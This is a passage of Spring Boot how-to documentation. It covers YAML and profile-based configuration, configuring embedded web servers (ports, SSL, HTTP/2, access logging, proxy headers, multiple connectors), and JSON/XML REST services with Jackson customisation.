`${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled Maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttps:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other\ndelimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku\nor Cloud Foundry. In those two platforms, the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external\nproperties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis one level deep and has period-separated keys, as many people are used to with\n`Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).\nAlso, you can launch your application with a `-D` argument (remember to put it before the\nmain class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-${profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. This section answers those questions.\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including\n`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or\n`spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty\nby including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,\n`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies\nin addition to including the one you need. Spring Boot provides separate starters for\nHTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow\n2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring\nWebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\t\/\/ exclude Reactor Netty\n\t\tcompile.exclude module: 'spring-boot-starter-reactor-netty'\n\t}\n\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-webflux'\n\t\t\/\/ Use Undertow instead\n\t\tcompile 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so\nyou may need to keep a dependency on Netty even when you need to include a different HTTP\nserver.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will\nautomatically start it. To disable this behaviour configure the `WebApplicationType` in\nyour `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with\n`server.port` (for example, in `application.properties` or as a System property). Thanks\nto relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,\nas an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`,\nuse `server.port=-1`. (Doing so is sometimes useful for testing.)\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. The best way to get that and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Contrary to a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. Spring Boot does not support the configuration of\nboth an HTTP connector and an HTTPS connector through `application.properties`. If you\nwant to have both, you need to configure one of them programmatically. We recommend using\n`application.properties` to configure HTTPS, as the HTTP connector is the easier of the\ntwo to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the\n`+server.http2.enabled+` configuration property. This support depends on the chosen web\nserver and the application environment, since that protocol is not supported\nout-of-the-box by JDK8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol. So you\nmust <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0+, HTTP\/2 is supported without any additional requirement on JDK8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the\nhttps:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies:\n`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x which supports HTTP\/2 out of the box when\nusing JDK 9 or later. Alternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative`\nlibrary and its dependencies are installed on the host operating system.\n\nThe library folder must be made available, if not already, to the JVM library path. You\ncan do so with a JVM argument such as\n`-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`. More on this in the\nhttps:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-webflux-starter` is using by default Reactor Netty as a server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports\nHTTP\/2 with native libraries. To enable that, your application needs to have an\nadditional dependency.\n\nSpring Boot manages the version for the\n`io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for\nall platforms. Developers can choose to import only the required dependencies using\na classifier (see http:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official\ndocumentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\n\nGenerally, you should first consider using one of the many available configuration keys\nand customize your web server by adding new entries in your `application.properties` (or\n`application.yml`, or environment, etc. see\n\"`<<howto-discover-build-in-options-for-external-properties>>`\"). The `server.{asterisk}`\nnamespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,\n`server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<common-application-properties>>.\n\nThe previous sections covered already many common use cases, such as compression, SSL\nor HTTP\/2. However, if a configuration key doesn't exist for your use case, you should\nthen look at\n{dc-spring-boot}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your\nchoice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty,\nUndertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to\nconfigure specific parts, like connectors, server resources, or the server itself - all\nusing server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will\noverride the one provided by Spring Boot. In this case, you can't rely on configuration\nproperties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. with the `spring-boot-starter-web`, there are two\nways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners\nsupported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must\nprovide a `@Bean` definition for it. Doing so can be very useful when you want to inject\nconfiguration or dependencies. However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.directory` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. To switch to the `LegacyCookieProcessor`, use an\n`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown\nin the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and\nadd a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans\nwith the underlying WebSocket container. When deployed to a standalone servlet container,\nthis role is performed by a servlet container initializer, and the\n`ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\nSpring Boot has a number of starters that include Spring MVC. Note that some starters\ninclude a dependency on Spring MVC rather than include it directly. This section answers\ncommon questions about Spring MVC and Spring Boot.\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by\ndefault as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy\nobject), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by\ndefault. Note that, in a browser, you might sometimes see XML responses, because browsers\ntend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you\ncan use it to render XML responses. The previous example that we used for JSON would\nwork. To use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) is\nused, with the additional requirement of having `MyThing` annotated as\n`@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON, you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath, you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by\ndefault) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing 